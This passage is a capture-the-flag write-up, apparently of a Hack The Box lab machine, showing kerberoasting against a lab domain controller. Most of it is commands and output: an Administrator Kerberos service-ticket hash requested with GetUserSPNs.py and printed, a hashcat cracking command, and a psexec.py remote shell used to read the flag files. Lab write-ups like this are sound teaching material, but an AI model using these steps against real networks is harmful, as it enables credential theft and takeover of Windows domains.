fw--w--w-- 34 Mon Sep 26 18:23:56 2022 user.txt
We can use GetUserSPNs with this account to get the krb5tgs. It's time to kerberoast.
$ GetUserSPNs.py active.htb/svc_tgs:GPP_PASSWORD -dc-ip 10.10.10.100 -request
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastL
ogon
-------------------- ------------- -------------------------------------------------------- ------------------- -----
--------------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40 2022-
09-08 14:13:55
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$528dbe3231d4988f301605a2f62183a0$532aa5033680d0e21de9cc28afc4a55dc
1212e81a0d77749eb494791a4eaaa3d67e13dcbaf599e0b15b7d2295aa48b84e6ec6d892760c82e69d5b72a82340504add99bcf315475c80f62b74ac3
6f8b4110de9e92487260c4bc947faeaa2bb3949b6db6a1e15beb338a018de07fb99866d96f00438e7c6c46e4106449eb94e25ad0a843cf0239f7acacd
e240d81b605cb7407bac10880ef9441cf4255b391c30ae9e1e601e202f9ddf1e3036ee8466075b23cb883dcd9ff57b8f808c76c2234e86a21f343d86e
124f200f88a11deb1b5a4179a88b09297b7396dc9f50b026d5cbac18a8158e89b2add0c459630af6aea165481186486a78b60b437ccd79daee34fe788
4b368df63f2cf1a1c86b2004274923d278535cefc1a6126414d1822574efd45ba35e392cd40f8b554be6d78ddf7d8628f8d390ddb69a6b61d9970c2b8
d79768a46f713ac38ccf2b42c154251b025cb8fc02a69fd6c68f117e00f002528204bace128a4fe0fedaf682fc45a913587c1ebda6a48fc525e3e1fbc
5b83dabdcd63d3727a6ebb2cec734d67f6dff6e2e26c59662f22394fff513fb0545b3650507ae49d0f0b5701a9fde4116db14c669a368a69e2e3e47f2
bfb25af051204d973c0e478589ab9bb7e6a944e9fa23d791528d7379b7f4f36e4fd9defdb7ab75fe75f966cf865edbb08c7819b86f89cbc48576429a5
46e9a436cfb352d1602c30b0a907e0a3adfeef44acc6bb9393aa92ab673cc5132063d0242e64f0b51e240d3665d5a660a6f21114897d6132f78b8abc6
349732fc401300f741331e492f9d8514057a3027b7dafd786af8feef4f885f1fcd4aee987d6e4346171acacd86c00b918e79a14942372cd4aee2c5948
04bd5fa70fd3638a9a346dfe6345c14ee24ec6ae5e72fd67e39558a18370d2f2414fe2b871ba06a246360c4ad885786de65c464037c6d4f041ac21609
40b58aa27b0aa8f1c6748679363e2ec01c2a79265928df973d7ac07740f9c433412130de6da3c76821f222f6d7035845255fe346cdff65e434d2dddfc
42fd94818e9dde77568e39fc8adc27170d1586d5d68cd5089d725aedd116962a72d11de96df438950e0381c74f006ce8e98e19c1734b705bd3f21cabc
fda4730873377120e080aa0f4cada07d22b603a3fb15fcd32d71f48f67d5f842c2b3400acfdbedfac082c7f3177a37ed8a8c55cd494af8f0434083704
28ffdbfd8baf3aaf238718bcf0ab6798cbce248c666e9d67600a7
Copy the krb5tgs hash and use hashcat on a Windows machine that has a decent GPU, if you have one available:
hashcat.exe -m 13100 krb5tgs_hash.txt rockyou.txt -O
The krb5tgs password should be printed in the results: KRB5TGS_PASSWORD.
Back in Kali, use psexec.py to get access.
$ psexec.py active.htb/Administrator:KRB5TGS_PASSWORD@10.10.10.100
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file CySmgJkQ.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service JqmJ on 10.10.10.100.....
[*] Starting service JqmJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
:\Windows\system32>cd \Users
C:\Users>dir
Volume in drive C has no label.
Volume Serial Number is 15BB-D59C
Directory of C:\Users
21/07/2018 05:39 úú <DIR> .
21/07/2018 05:39 úú <DIR> ..
16/07/2018 01:14 úú <DIR> Administrator
14/07/2009 07:57 ºú <DIR> Public
21/07/2018 06:16 úú <DIR> SVC_TGS
0 File(s) 0 bytes
5 Dir(s) 1.144.369.152 bytes free
C:\Users>dir SVC_TGS
Volume in drive C has no label.
Volume Serial Number is 15BB-D59C
Directory of C:\Users\SVC_TGS
21/07/2018 06:16 úú <DIR> .
21/07/2018 06:16 úú <DIR> ..
21/07/2018 06:14 úú <DIR> Contacts
21/07/2018 06:14 úú <DIR> Desktop
21/07/2018 06:14 úú <DIR> Downloads
21/07/2018 06:14 úú <DIR> Favorites
21/07/2018 06:14 úú <DIR> Links
21/07/2018 06:15 úú <DIR> My Documents
21/07/2018 06:15 úú <DIR> My Music
21/07/2018 06:15 úú <DIR> My Pictures
21/07/2018 06:15 úú <DIR> My Videos
21/07/2018 06:16 úú <DIR> Saved Games
21/07/2018 06:16 úú <DIR> Searches
0 File(s) 0 bytes
13 Dir(s) 1.144.369.152 bytes free
C:\Users>dir SVC_TGS\Desktop
Volume in drive C has no label.
Volume Serial Number is 15BB-D59C
Directory of C:\Users\SVC_TGS\Desktop
21/07/2018 06:14 úú <DIR> .
21/07/2018 06:14 úú <DIR> ..
08/09/2022 09:13 úú 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 1.144.369.152 bytes free
C:\Users>type SVC_TGS\Desktop\user.txt
ABCDEFGHIJKLMNOPQRSTUVWXYZ12345678
C:\Users>dir Administrator\Desktop
Volume in drive C has no label.
Volume Serial Number is 15BB-D59C
Directory of C:\Users\Administrator\Desktop
21/01/2021 07:49 úú <DIR> .
21/01/2021 07:49 úú <DIR> ..
08/09/2022 09:13 úú 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 1.144.369.152 bytes free
C:\Users>type Administrator\Desktop\root.txt
ABCDEFGHIJKLMNOPQRSTUVWXYZ12345678
C:\Users>
It might be worth the time to see what other vulnerabilities this machine has.
More info:
book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast
github.com/nidem/kerberoast
gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a